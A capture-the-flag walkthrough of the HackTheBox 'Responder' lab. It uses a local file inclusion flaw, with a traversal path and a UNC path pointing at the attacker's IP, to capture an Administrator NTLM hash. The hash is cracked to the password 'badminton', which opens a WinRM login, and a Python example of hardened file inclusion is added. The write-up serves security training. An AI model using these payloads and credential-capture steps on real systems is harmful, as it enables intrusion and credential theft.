HackTheBox

Responder

Responder is a boot2root challenge on HackTheBox. It is rated “Very Easy” and is part of the Starting Point challenges.

Enumeration

Enumeration started with an Nmap scan. The following command scans the top 1000 TCP ports of the target, runs the default NSE scripts (-sC) and does service version detection (-sV). The results are written in normal format to a file called “initial” (-oN). I also increased the verbosity of the scan with -vv.

sudo nmap 10.129.185.223 -sC -sV -oN initial -vv

After the scan, we can see that the target is running an Apache web server on port 80.

After that I started another scan, which covers all 65535 TCP ports of the target (-p-):

sudo nmap 10.129.185.223 -p- -oN all_ports -vv

The second scan showed that there were 3 ports open.

I scanned the target again with Rustscan and it seemed like port 7680 was closed, so this was a false positive.

Analyzing the web server

After opening the IP in a web browser to navigate to the web server, we get redirected to “unika.htb”.

So I have added that domain to my /etc/hosts file.

After that I was able to open the web page.

With Wappalyzer I was able to analyze which technologies are used. The interesting ones are that the target is a Windows server and that the site is written in PHP.

The web page has the functionality to change the language. When changing it, the parameter “page” is used, followed by an HTML file name.

Next I tested that parameter for a local file inclusion vulnerability. I tried to load the hosts file on the server. Because this server is a Windows host, I used the following path:

../../../../../../../../windows/system32/drivers/etc/hosts

After that I tried to load a remote file. First I started Responder on the tun0 interface, because that is the interface through which I am connected to the HTB network:

sudo responder -I tun0

Next I sent the following GET request:

http://unika.htb/index.php?page=//MY_IP/test

That request worked and I was able to see the NTLM hash of the Administrator user of the target machine:
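The “page” parameter behaves like an unvalidated include: whatever string the client supplies becomes the path, so “../” traversal reaches the Windows hosts file and a “//host/share” path makes the server open an SMB connection to the attacker, which is what Responder answers. The following Python is an added example, not code from the page or from the target: it shows the same vulnerable shape beside a hardened resolver that combines an allowlist of language files with a containment check. The pages directory, the allowlist entries and the candidate inputs are assumptions made for the example.

```python
import os

# Assumed layout: the language pages live in one fixed directory under the web root.
PAGES_DIR = os.path.realpath("pages")
# Assumed allowlist: the only files the "page" parameter is meant to select.
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}


def vulnerable_resolve(page: str) -> str:
    """Mirrors include($_GET['page']) with no validation: the client string is the path.
    Traversal ('../../../windows/...') and UNC-style paths ('//attacker/share') pass through."""
    return page


def resolve_under(base_dir: str, page: str):
    """Containment check: resolve the candidate and require it to stay inside base_dir.
    Returns the resolved absolute path, or None if the candidate escapes base_dir."""
    if "\x00" in page:  # an embedded NUL truncates the path in C-based runtimes
        return None
    # os.path.join discards base_dir when `page` is absolute or starts with '//',
    # so the commonpath comparison below is what actually rejects those inputs.
    candidate = os.path.realpath(os.path.join(base_dir, page))
    try:
        inside = os.path.commonpath([base_dir, candidate]) == base_dir
    except ValueError:  # different drives / UNC root on Windows: cannot be inside
        return None
    return candidate if inside else None


def hardened_resolve(page: str):
    """Primary control is the allowlist; the containment check is defence in depth
    against a later mistake in the allowlist or in the directory layout."""
    if page not in ALLOWED_PAGES:
        return None
    return resolve_under(PAGES_DIR, page)


if __name__ == "__main__":
    # Constructed inputs: one legitimate page and the two payload shapes used above.
    for page in ("french.html",
                 "../../../../../../../../windows/system32/drivers/etc/hosts",
                 "//10.10.14.5/test"):
        print(f"{page!r}: vulnerable -> {vulnerable_resolve(page)!r}, hardened -> {hardened_resolve(page)!r}")
```

The allowlist alone would stop both payloads; the containment check is kept because it also protects any other handler that has to accept a client-supplied file name.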

I saved that hash into a file called “hash.txt” and used John the Ripper to crack it with the “rockyou.txt” password list.

Getting the flag

From the scans we know that WinRM is running on the server, so I connected to the target as Administrator using evil-winrm:

evil-winrm -i 10.129.185.223 -u Administrator -p badminton

The flag was in the Desktop folder of the user mike:

Rabbit